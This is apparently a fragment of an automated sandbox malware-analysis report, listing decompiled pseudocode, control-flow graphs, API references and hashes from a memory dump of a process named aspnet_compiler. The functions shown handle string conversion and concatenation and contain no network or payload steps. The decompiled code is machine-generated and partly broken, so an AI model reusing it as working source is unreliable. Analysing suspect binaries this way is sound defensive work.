                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 299 10008821-1000883a 300 10008850-10008855 299->300 301 1000883c-1000884c 299->301 302 10008862-10008886 MultiByteToWideChar 300->302 303 10008857-1000885f 300->303 301->300 307 1000884e 301->307 305 10008a19-10008a2c call 10002ada 302->305 306 1000888c-10008898 302->306 303->302 308 1000889a-100088ab 306->308 309 100088ec 306->309 307->300 312 100088ca-100088db call 100056d0 308->312 313 100088ad-100088bc 308->313 311 100088ee-100088f0 309->311 316 100088f6-10008909 MultiByteToWideChar 311->316 317 10008a0e 311->317 312->317 322 100088e1 312->322 313->317 325 100088c2-100088c8 313->325 316->317 319 1000890f-1000892a call 10005f19 316->319 320 10008a10-10008a17 call 10008801 317->320 319->317 329 10008930-10008937 319->329 320->305 326 100088e7-100088ea 322->326 325->326 326->311 330 10008971-1000897d 329->330 331 10008939-1000893e 329->331 332 100089c9 330->332 333 1000897f-10008990 330->333 331->320 334 10008944-10008946 331->334 337 100089cb-100089cd 332->337 335 10008992-100089a1 333->335 336 100089ab-100089bc call 100056d0 333->336 334->317 338 1000894c-10008966 call 10005f19 334->338 340 10008a07-10008a0d call 10008801 335->340 350 100089a3-100089a9 335->350 336->340 352 100089be 336->352 337->340 341 100089cf-100089e8 call 10005f19 337->341 338->320 349 1000896c 338->349 340->317 341->340 353 100089ea-100089f1 341->353 349->317 354 100089c4-100089c7 350->354 352->354 355 100089f3-100089f4 353->355 356 10008a2d-10008a33 353->356 354->337 357 100089f5-10008a05 WideCharToMultiByte 355->357 356->357 357->340 358 10008a35-10008a3c call 10008801 357->358 358->320
                                                                                                                                                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                                                                                                                                                  			E10008821(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                                                                                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                                                                                                                  				int _v12;
                                                                                                                                                                                                                                                                  				void* _v24;
                                                                                                                                                                                                                                                                  				signed int _t49;
                                                                                                                                                                                                                                                                  				int _t50;
                                                                                                                                                                                                                                                                  				signed int _t54;
                                                                                                                                                                                                                                                                  				int _t58;
                                                                                                                                                                                                                                                                  				signed int _t60;
                                                                                                                                                                                                                                                                  				short* _t62;
                                                                                                                                                                                                                                                                  				signed int _t66;
                                                                                                                                                                                                                                                                  				short* _t70;
                                                                                                                                                                                                                                                                  				int _t71;
                                                                                                                                                                                                                                                                  				short* _t80;
                                                                                                                                                                                                                                                                  				signed int _t86;
                                                                                                                                                                                                                                                                  				signed int _t89;
                                                                                                                                                                                                                                                                  				void* _t94;
                                                                                                                                                                                                                                                                  				void* _t95;
                                                                                                                                                                                                                                                                  				int _t97;
                                                                                                                                                                                                                                                                  				short* _t100;
                                                                                                                                                                                                                                                                  				int _t102;
                                                                                                                                                                                                                                                                  				signed int _t105;
                                                                                                                                                                                                                                                                  				short* _t106;
                                                                                                                                                                                                                                                                  				void* _t109;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                                                                                                                  				_t49 =  *0x10013014; // 0xf4aa7632
                                                                                                                                                                                                                                                                  				_t50 = _t49 ^ _t105;
                                                                                                                                                                                                                                                                  				_v8 = _t50;
                                                                                                                                                                                                                                                                  				_push(__esi);
                                                                                                                                                                                                                                                                  				_t102 = _a20;
                                                                                                                                                                                                                                                                  				if(_t102 > 0) {
                                                                                                                                                                                                                                                                  					0x10009341(_a16, _t102);
                                                                                                                                                                                                                                                                  					_t109 = _t50 - _t102;
                                                                                                                                                                                                                                                                  					_t4 = _t50 + 1; // 0x1
                                                                                                                                                                                                                                                                  					_t102 = _t4;
                                                                                                                                                                                                                                                                  					if(_t109 >= 0) {
                                                                                                                                                                                                                                                                  						_t102 = _t50;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_t97 = _a32;
                                                                                                                                                                                                                                                                  				if(_t97 == 0) {
                                                                                                                                                                                                                                                                  					_t97 =  *( *_a4 + 8);
                                                                                                                                                                                                                                                                  					_a32 = _t97;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
                                                                                                                                                                                                                                                                  				_v12 = _t54;
                                                                                                                                                                                                                                                                  				if(_t54 == 0) {
                                                                                                                                                                                                                                                                  					L38:
                                                                                                                                                                                                                                                                  					return E10002ADA(_v8 ^ _t105);
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_t94 = _t54 + _t54;
                                                                                                                                                                                                                                                                  					_t84 = _t94 + 8;
                                                                                                                                                                                                                                                                  					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                  					if((_t94 + 0x00000008 & _t54) == 0) {
                                                                                                                                                                                                                                                                  						_t80 = 0;
                                                                                                                                                                                                                                                                  						__eflags = 0;
                                                                                                                                                                                                                                                                  						L14:
                                                                                                                                                                                                                                                                  						if(_t80 == 0) {
                                                                                                                                                                                                                                                                  							L36:
                                                                                                                                                                                                                                                                  							_t104 = 0;
                                                                                                                                                                                                                                                                  							L37:
                                                                                                                                                                                                                                                                  							E10008801(_t80);
                                                                                                                                                                                                                                                                  							goto L38;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t58 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t80, _v12);
                                                                                                                                                                                                                                                                  						_t120 = _t58;
                                                                                                                                                                                                                                                                  						if(_t58 == 0) {
                                                                                                                                                                                                                                                                  							goto L36;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t99 = _v12;
                                                                                                                                                                                                                                                                  						_t60 = E10005F19(_t84, _t102, _t120, _a8, _a12, _t80, _v12, 0, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                  						_t104 = _t60;
                                                                                                                                                                                                                                                                  						if(_t104 == 0) {
                                                                                                                                                                                                                                                                  							goto L36;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if((_a12 & 0x00000400) == 0) {
                                                                                                                                                                                                                                                                  							_t95 = _t104 + _t104;
                                                                                                                                                                                                                                                                  							_t86 = _t95 + 8;
                                                                                                                                                                                                                                                                  							__eflags = _t95 - _t86;
                                                                                                                                                                                                                                                                  							asm("sbb eax, eax");
                                                                                                                                                                                                                                                                  							__eflags = _t86 & _t60;
                                                                                                                                                                                                                                                                  							if((_t86 & _t60) == 0) {
                                                                                                                                                                                                                                                                  								_t100 = 0;
                                                                                                                                                                                                                                                                  								__eflags = 0;
                                                                                                                                                                                                                                                                  								L30:
                                                                                                                                                                                                                                                                  								__eflags = _t100;
                                                                                                                                                                                                                                                                  								if(__eflags == 0) {
                                                                                                                                                                                                                                                                  									L35:
                                                                                                                                                                                                                                                                  									E10008801(_t100);
                                                                                                                                                                                                                                                                  									goto L36;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t62 = E10005F19(_t86, _t104, __eflags, _a8, _a12, _t80, _v12, _t100, _t104, 0, 0, 0);
                                                                                                                                                                                                                                                                  								__eflags = _t62;
                                                                                                                                                                                                                                                                  								if(_t62 == 0) {
                                                                                                                                                                                                                                                                  									goto L35;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_push(0);
                                                                                                                                                                                                                                                                  								_push(0);
                                                                                                                                                                                                                                                                  								__eflags = _a28;
                                                                                                                                                                                                                                                                  								if(_a28 != 0) {
                                                                                                                                                                                                                                                                  									_push(_a28);
                                                                                                                                                                                                                                                                  									_push(_a24);
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									_push(0);
                                                                                                                                                                                                                                                                  									_push(0);
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
                                                                                                                                                                                                                                                                  								__eflags = _t104;
                                                                                                                                                                                                                                                                  								if(_t104 != 0) {
                                                                                                                                                                                                                                                                  									E10008801(_t100);
                                                                                                                                                                                                                                                                  									goto L37;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									goto L35;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t89 = _t95 + 8;
                                                                                                                                                                                                                                                                  							__eflags = _t95 - _t89;
                                                                                                                                                                                                                                                                  							asm("sbb eax, eax");
                                                                                                                                                                                                                                                                  							_t66 = _t60 & _t89;
                                                                                                                                                                                                                                                                  							_t86 = _t95 + 8;
                                                                                                                                                                                                                                                                  							__eflags = _t66 - 0x400;
                                                                                                                                                                                                                                                                  							if(_t66 > 0x400) {
                                                                                                                                                                                                                                                                  								__eflags = _t95 - _t86;
                                                                                                                                                                                                                                                                  								asm("sbb eax, eax");
                                                                                                                                                                                                                                                                  								_t100 = E100056D0(_t86, _t66 & _t86);
                                                                                                                                                                                                                                                                  								_pop(_t86);
                                                                                                                                                                                                                                                                  								__eflags = _t100;
                                                                                                                                                                                                                                                                  								if(_t100 == 0) {
                                                                                                                                                                                                                                                                  									goto L35;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								 *_t100 = 0xdddd;
                                                                                                                                                                                                                                                                  								L28:
                                                                                                                                                                                                                                                                  								_t100 =  &(_t100[4]);
                                                                                                                                                                                                                                                                  								goto L30;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							__eflags = _t95 - _t86;
                                                                                                                                                                                                                                                                  							asm("sbb eax, eax");
                                                                                                                                                                                                                                                                  							0x1000bf20();
                                                                                                                                                                                                                                                                  							_t100 = _t106;
                                                                                                                                                                                                                                                                  							__eflags = _t100;
                                                                                                                                                                                                                                                                  							if(_t100 == 0) {
                                                                                                                                                                                                                                                                  								goto L35;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							 *_t100 = 0xcccc;
                                                                                                                                                                                                                                                                  							goto L28;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t70 = _a28;
                                                                                                                                                                                                                                                                  						if(_t70 == 0) {
                                                                                                                                                                                                                                                                  							goto L37;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t124 = _t104 - _t70;
                                                                                                                                                                                                                                                                  						if(_t104 > _t70) {
                                                                                                                                                                                                                                                                  							goto L36;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t71 = E10005F19(0, _t104, _t124, _a8, _a12, _t80, _t99, _a24, _t70, 0, 0, 0);
                                                                                                                                                                                                                                                                  						_t104 = _t71;
                                                                                                                                                                                                                                                                  						if(_t71 != 0) {
                                                                                                                                                                                                                                                                  							goto L37;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L36;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                  					_t72 = _t54 & _t94 + 0x00000008;
                                                                                                                                                                                                                                                                  					_t84 = _t94 + 8;
                                                                                                                                                                                                                                                                  					if((_t54 & _t94 + 0x00000008) > 0x400) {
                                                                                                                                                                                                                                                                  						__eflags = _t94 - _t84;
                                                                                                                                                                                                                                                                  						asm("sbb eax, eax");
                                                                                                                                                                                                                                                                  						_t80 = E100056D0(_t84, _t72 & _t84);
                                                                                                                                                                                                                                                                  						_pop(_t84);
                                                                                                                                                                                                                                                                  						__eflags = _t80;
                                                                                                                                                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                                                                                                                                                  							goto L36;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						 *_t80 = 0xdddd;
                                                                                                                                                                                                                                                                  						L12:
                                                                                                                                                                                                                                                                  						_t80 =  &(_t80[4]);
                                                                                                                                                                                                                                                                  						goto L14;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                  					0x1000bf20();
                                                                                                                                                                                                                                                                  					_t80 = _t106;
                                                                                                                                                                                                                                                                  					if(_t80 == 0) {
                                                                                                                                                                                                                                                                  						goto L36;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					 *_t80 = 0xcccc;
                                                                                                                                                                                                                                                                  					goto L12;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}


























                                                                                                                                                                                                                                                                  0x10008826
                                                                                                                                                                                                                                                                  0x10008827
                                                                                                                                                                                                                                                                  0x10008828
                                                                                                                                                                                                                                                                  0x1000882d
                                                                                                                                                                                                                                                                  0x1000882f
                                                                                                                                                                                                                                                                  0x10008833
                                                                                                                                                                                                                                                                  0x10008834
                                                                                                                                                                                                                                                                  0x1000883a
                                                                                                                                                                                                                                                                  0x10008840
                                                                                                                                                                                                                                                                  0x10008846
                                                                                                                                                                                                                                                                  0x10008849
                                                                                                                                                                                                                                                                  0x10008849
                                                                                                                                                                                                                                                                  0x1000884c
                                                                                                                                                                                                                                                                  0x1000884e
                                                                                                                                                                                                                                                                  0x1000884e
                                                                                                                                                                                                                                                                  0x1000884c
                                                                                                                                                                                                                                                                  0x10008850
                                                                                                                                                                                                                                                                  0x10008855
                                                                                                                                                                                                                                                                  0x1000885c
                                                                                                                                                                                                                                                                  0x1000885f
                                                                                                                                                                                                                                                                  0x1000885f
                                                                                                                                                                                                                                                                  0x1000887b
                                                                                                                                                                                                                                                                  0x10008881
                                                                                                                                                                                                                                                                  0x10008886
                                                                                                                                                                                                                                                                  0x10008a19
                                                                                                                                                                                                                                                                  0x10008a2c
                                                                                                                                                                                                                                                                  0x1000888c
                                                                                                                                                                                                                                                                  0x1000888c
                                                                                                                                                                                                                                                                  0x1000888f
                                                                                                                                                                                                                                                                  0x10008894
                                                                                                                                                                                                                                                                  0x10008898
                                                                                                                                                                                                                                                                  0x100088ec
                                                                                                                                                                                                                                                                  0x100088ec
                                                                                                                                                                                                                                                                  0x100088ee
                                                                                                                                                                                                                                                                  0x100088f0
                                                                                                                                                                                                                                                                  0x10008a0e
                                                                                                                                                                                                                                                                  0x10008a0e
                                                                                                                                                                                                                                                                  0x10008a10
                                                                                                                                                                                                                                                                  0x10008a11
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10008a17
                                                                                                                                                                                                                                                                  0x10008901
                                                                                                                                                                                                                                                                  0x10008907
                                                                                                                                                                                                                                                                  0x10008909
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x1000890f
                                                                                                                                                                                                                                                                  0x10008921
                                                                                                                                                                                                                                                                  0x10008926
                                                                                                                                                                                                                                                                  0x1000892a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10008937
                                                                                                                                                                                                                                                                  0x10008971
                                                                                                                                                                                                                                                                  0x10008974
                                                                                                                                                                                                                                                                  0x10008977
                                                                                                                                                                                                                                                                  0x10008979
                                                                                                                                                                                                                                                                  0x1000897b
                                                                                                                                                                                                                                                                  0x1000897d
                                                                                                                                                                                                                                                                  0x100089c9
                                                                                                                                                                                                                                                                  0x100089c9
                                                                                                                                                                                                                                                                  0x100089cb
                                                                                                                                                                                                                                                                  0x100089cb
                                                                                                                                                                                                                                                                  0x100089cd
                                                                                                                                                                                                                                                                  0x10008a07
                                                                                                                                                                                                                                                                  0x10008a08
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10008a0d
                                                                                                                                                                                                                                                                  0x100089e1
                                                                                                                                                                                                                                                                  0x100089e6
                                                                                                                                                                                                                                                                  0x100089e8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100089ec
                                                                                                                                                                                                                                                                  0x100089ed
                                                                                                                                                                                                                                                                  0x100089ee
                                                                                                                                                                                                                                                                  0x100089f1
                                                                                                                                                                                                                                                                  0x10008a2d
                                                                                                                                                                                                                                                                  0x10008a30
                                                                                                                                                                                                                                                                  0x100089f3
                                                                                                                                                                                                                                                                  0x100089f3
                                                                                                                                                                                                                                                                  0x100089f4
                                                                                                                                                                                                                                                                  0x100089f4
                                                                                                                                                                                                                                                                  0x10008a01
                                                                                                                                                                                                                                                                  0x10008a03
                                                                                                                                                                                                                                                                  0x10008a05
                                                                                                                                                                                                                                                                  0x10008a36
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10008a05
                                                                                                                                                                                                                                                                  0x1000897f
                                                                                                                                                                                                                                                                  0x10008982
                                                                                                                                                                                                                                                                  0x10008984
                                                                                                                                                                                                                                                                  0x10008986
                                                                                                                                                                                                                                                                  0x10008988
                                                                                                                                                                                                                                                                  0x1000898b
                                                                                                                                                                                                                                                                  0x10008990
                                                                                                                                                                                                                                                                  0x100089ab
                                                                                                                                                                                                                                                                  0x100089ad
                                                                                                                                                                                                                                                                  0x100089b7
                                                                                                                                                                                                                                                                  0x100089b9
                                                                                                                                                                                                                                                                  0x100089ba
                                                                                                                                                                                                                                                                  0x100089bc
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100089be
                                                                                                                                                                                                                                                                  0x100089c4
                                                                                                                                                                                                                                                                  0x100089c4
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100089c4
                                                                                                                                                                                                                                                                  0x10008992
                                                                                                                                                                                                                                                                  0x10008994
                                                                                                                                                                                                                                                                  0x10008998
                                                                                                                                                                                                                                                                  0x1000899d
                                                                                                                                                                                                                                                                  0x1000899f
                                                                                                                                                                                                                                                                  0x100089a1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100089a3
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100089a3
                                                                                                                                                                                                                                                                  0x10008939
                                                                                                                                                                                                                                                                  0x1000893e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10008944
                                                                                                                                                                                                                                                                  0x10008946
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x1000895d
                                                                                                                                                                                                                                                                  0x10008962
                                                                                                                                                                                                                                                                  0x10008966
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x1000896c
                                                                                                                                                                                                                                                                  0x1000889f
                                                                                                                                                                                                                                                                  0x100088a1
                                                                                                                                                                                                                                                                  0x100088a3
                                                                                                                                                                                                                                                                  0x100088ab
                                                                                                                                                                                                                                                                  0x100088ca
                                                                                                                                                                                                                                                                  0x100088cc
                                                                                                                                                                                                                                                                  0x100088d6
                                                                                                                                                                                                                                                                  0x100088d8
                                                                                                                                                                                                                                                                  0x100088d9
                                                                                                                                                                                                                                                                  0x100088db
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100088e1
                                                                                                                                                                                                                                                                  0x100088e7
                                                                                                                                                                                                                                                                  0x100088e7
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100088e7
                                                                                                                                                                                                                                                                  0x100088af
                                                                                                                                                                                                                                                                  0x100088b3
                                                                                                                                                                                                                                                                  0x100088b8
                                                                                                                                                                                                                                                                  0x100088bc
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100088c2
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100088c2

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 10008A08
                                                                                                                                                                                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 10008A11
                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 10008A36
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                  • Opcode ID: 29b5eaefa9c830c4bd0895403f0a1f44945db011b9b9ff36e860d53063b6f26f
                                                                                                                                                                                                                                                                  • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29b5eaefa9c830c4bd0895403f0a1f44945db011b9b9ff36e860d53063b6f26f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E100015DA(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				void _v40;
                                                                                                                                                                                                                                                                  				short _v42;
                                                                                                                                                                                                                                                                  				short _v44;
                                                                                                                                                                                                                                                                  				void* __edi;
                                                                                                                                                                                                                                                                  				short _t20;
                                                                                                                                                                                                                                                                  				short _t21;
                                                                                                                                                                                                                                                                  				int _t31;
                                                                                                                                                                                                                                                                  				intOrPtr _t41;
                                                                                                                                                                                                                                                                  				signed int _t43;
                                                                                                                                                                                                                                                                  				WCHAR* _t63;
                                                                                                                                                                                                                                                                  				intOrPtr _t64;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t40 = _a4;
                                                                                                                                                                                                                                                                  				_t20 = 0xd;
                                                                                                                                                                                                                                                                  				_v44 = _t20;
                                                                                                                                                                                                                                                                  				_t21 = 0xa;
                                                                                                                                                                                                                                                                  				_t64 = __ecx;
                                                                                                                                                                                                                                                                  				_v42 = _t21;
                                                                                                                                                                                                                                                                  				_t43 = 7;
                                                                                                                                                                                                                                                                  				_v12 = __edx;
                                                                                                                                                                                                                                                                  				memset( &_v40, 0, _t43 << 2);
                                                                                                                                                                                                                                                                  				_v8 = _t64;
                                                                                                                                                                                                                                                                  				if(E100044B0(_a4) > 0x3e8) {
                                                                                                                                                                                                                                                                  					E10004540(_t40 + 0xb, 0x10011c24);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				E100019B2(_t40, _a8);
                                                                                                                                                                                                                                                                  				_t63 = _t64 + 8;
                                                                                                                                                                                                                                                                  				E10001C9D(_t63, _v12, _t63);
                                                                                                                                                                                                                                                                  				E10001C9D(_v8 + 8 + lstrlenW(_t63) * 2, _t40, _t63);
                                                                                                                                                                                                                                                                  				lstrcatW(_t63,  &_v44);
                                                                                                                                                                                                                                                                  				_t31 = lstrlenW(_t63);
                                                                                                                                                                                                                                                                  				_t41 = _v8;
                                                                                                                                                                                                                                                                  				_t17 = _t41 + 0x808; // 0x808
                                                                                                                                                                                                                                                                  				_t66 = _t17;
                                                                                                                                                                                                                                                                  				 *((intOrPtr*)(_t41 + 4)) = _t31 + _t31;
                                                                                                                                                                                                                                                                  				if(E10004444(_t31 + _t31, _t63, _t17) != 0) {
                                                                                                                                                                                                                                                                  					_t19 = _t41 + 0x1008; // 0x1008
                                                                                                                                                                                                                                                                  					lstrcatW(_t19, _t63);
                                                                                                                                                                                                                                                                  					E10004484(_t66, _t63);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return E10002C40(_t63, _t63, 0, 0x400);
                                                                                                                                                                                                                                                                  			}
















                                                                                                                                                                                                                                                                  0x100015e1
                                                                                                                                                                                                                                                                  0x100015e8
                                                                                                                                                                                                                                                                  0x100015eb
                                                                                                                                                                                                                                                                  0x100015f2
                                                                                                                                                                                                                                                                  0x100015f3
                                                                                                                                                                                                                                                                  0x100015f5
                                                                                                                                                                                                                                                                  0x100015fb
                                                                                                                                                                                                                                                                  0x100015fe
                                                                                                                                                                                                                                                                  0x10001601
                                                                                                                                                                                                                                                                  0x10001604
                                                                                                                                                                                                                                                                  0x10001612
                                                                                                                                                                                                                                                                  0x1000161d
                                                                                                                                                                                                                                                                  0x10001623
                                                                                                                                                                                                                                                                  0x10001629
                                                                                                                                                                                                                                                                  0x10001631
                                                                                                                                                                                                                                                                  0x10001637
                                                                                                                                                                                                                                                                  0x10001650
                                                                                                                                                                                                                                                                  0x1000165a
                                                                                                                                                                                                                                                                  0x10001661
                                                                                                                                                                                                                                                                  0x10001663
                                                                                                                                                                                                                                                                  0x10001668
                                                                                                                                                                                                                                                                  0x10001668
                                                                                                                                                                                                                                                                  0x1000166e
                                                                                                                                                                                                                                                                  0x1000167c
                                                                                                                                                                                                                                                                  0x1000167f
                                                                                                                                                                                                                                                                  0x10001686
                                                                                                                                                                                                                                                                  0x1000168e
                                                                                                                                                                                                                                                                  0x10001694
                                                                                                                                                                                                                                                                  0x100016a9

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 10001607
                                                                                                                                                                                                                                                                  • _strcat.LIBCMT ref: 1000161D
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1922816806-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9669c23f4861f424a89e7b8ff4685c7ad96e6594ae57ef6ca9720756efc6abdf
                                                                                                                                                                                                                                                                  • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
